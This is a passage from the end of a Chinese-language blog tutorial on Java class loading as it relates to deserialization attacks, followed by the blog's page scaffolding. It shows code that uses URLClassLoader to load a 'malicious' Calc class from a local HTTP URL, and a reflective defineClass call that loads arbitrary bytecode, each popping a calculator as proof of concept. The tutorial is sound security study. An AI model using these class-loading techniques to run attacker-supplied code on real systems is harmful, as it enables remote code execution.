class="hljs-comment">//创建一个URLClassLoader对象，该对象使用URL数组作为参数进行初始化。在这里，URL数组只包含一个URL，即&quot;http://127.0.0.1/&quot;。</span><br>        Class&lt;?&gt; aClass = urlClassLoader.loadClass(<span class="hljs-string">&quot;Calc&quot;</span>); <span class="hljs-comment">//使用URLClassLoader的loadClass方法加载名为&quot;Calc&quot;的类。这会从指定的URL加载类的字节码。</span><br>        aClass.newInstance(); <span class="hljs-comment">//通过调用newInstance方法创建&quot;Calc&quot;类的一个新实例。</span><br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>成功加载了恶意类</p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240517142959216.png" srcset="/img/loading.gif" lazyload alt="image-20240517142959216"></p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240517143025537.png" srcset="/img/loading.gif" lazyload alt="image-20240517143025537"></p>
<p>可以看到URLclassLoader可以加载class文件，除了http之外还可以用别的协议，比如file协议，jar协议等等</p>
<h6 id="通过defineClass反射加载任意类"><a href="#通过defineClass反射加载任意类" class="headerlink" title="通过defineClass反射加载任意类"></a>通过defineClass反射加载任意类</h6><p>前面分析得知，最终加载类的字节码是用的 Classloader.defineClass 方法，这里通过反射来调用 defineClass 方法加载任意类，只需要以字节码的形式传入即可</p>
<p>编写代码：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">import</span> java.io.IOException;<br><span class="hljs-keyword">import</span> java.lang.reflect.InvocationTargetException;<br><span class="hljs-keyword">import</span> java.lang.reflect.Method;<br><span class="hljs-keyword">import</span> java.nio.file.Files;<br><span class="hljs-keyword">import</span> java.nio.file.Paths;<br><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">Main</span> &#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">main</span><span class="hljs-params">(String[] args)</span> <span class="hljs-keyword">throws</span> InstantiationException, IllegalAccessException, IOException, NoSuchMethodException, InvocationTargetException &#123;<br>        <span class="hljs-type">ClassLoader</span> <span class="hljs-variable">classLoader</span> <span class="hljs-operator">=</span> ClassLoader.getSystemClassLoader(); <span class="hljs-comment">//获取系统类加载器（Application ClassLoader）</span><br>        <span class="hljs-type">Method</span> <span class="hljs-variable">defineClass</span> <span class="hljs-operator">=</span> ClassLoader.class.getDeclaredMethod(<span class="hljs-string">&quot;defineClass&quot;</span>, String.class, <span class="hljs-type">byte</span>[].class, <span class="hljs-type">int</span>.class, <span class="hljs-type">int</span>.class); <span class="hljs-comment">//使用反射获取ClassLoader类中的defineClass方法，该方法用于定义新的类</span><br>        defineClass.setAccessible(<span class="hljs-literal">true</span>); <span class="hljs-comment">//设置defineClass方法为可访问（公有），因为它是ClassLoader类的一个受保护方法</span><br>        <span class="hljs-type">byte</span>[] bytes = Files.readAllBytes(Paths.get(<span class="hljs-string">&quot;/home/Simply/Test/Calc.class&quot;</span>)); <span class="hljs-comment">//读取位于指定路径/home/Simply/Test/Calc.class的字节码文件内容，并将其保存为字节数组</span><br>        <span class="hljs-type">Class</span> <span class="hljs-variable">calc</span> <span class="hljs-operator">=</span> (Class)defineClass.invoke(classLoader, <span class="hljs-string">&quot;Calc&quot;</span>, bytes, <span class="hljs-number">0</span>, bytes.length); <span class="hljs-comment">//使用defineClass方法将字节码转换为Class对象，并指定类的名称为&quot;Calc&quot;</span><br>        calc.newInstance(); <span class="hljs-comment">//通过调用newInstance方法创建&quot;Calc&quot;类的一个新实例</span><br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>成功弹出计算器</p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240517144920390.png" srcset="/img/loading.gif" lazyload alt="image-20240517144920390"></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/Java/">#Java</a>
      
        <a href="/tags/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">#Java反序列化</a>
      
        <a href="/tags/%E7%B1%BB%E5%8A%A0%E8%BD%BD/">#类加载</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>java反序列化和类加载机制</div>
      <div>http://example.com/2024/05/20/java反序列化和类加载机制/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Simply</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年5月20日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/03/06/fastjson%E4%BD%8E%E7%89%88%E6%9C%AC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%B5%85%E6%9E%90/" title="fastjson低版本反序列化漏洞浅析">
                        <span class="hidden-mobile">fastjson低版本反序列化漏洞浅析</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.5.1/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"pw5wiM2PguIgoOksiuFeFaJa-gzGzoHsz","appKey":"YviqKAHsF1z7DaAKl4Ch5eSr","path":"window.location.pathname","placeholder":null,"avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":false,"serverURLs":"https://pw5wim2p.lc-cn-n1-shared.com","emojiCDN":null,"emojiMaps":null,"enableQQ":false},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="leancloud-site-pv-container" style="display: none">
        总访问量
        <span id="leancloud-site-pv"></span>
        次
      </span>
    
    
      <span id="leancloud-site-uv-container" style="display: none">
        总访客数
        <span id="leancloud-site-uv"></span>
        人
      </span>
    
    

  
</div>

  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/leancloud.js" ></script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"live2d-widget-model-wanko"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true},"react":{"opacity":0.7},"log":false});</script></body>
</html>
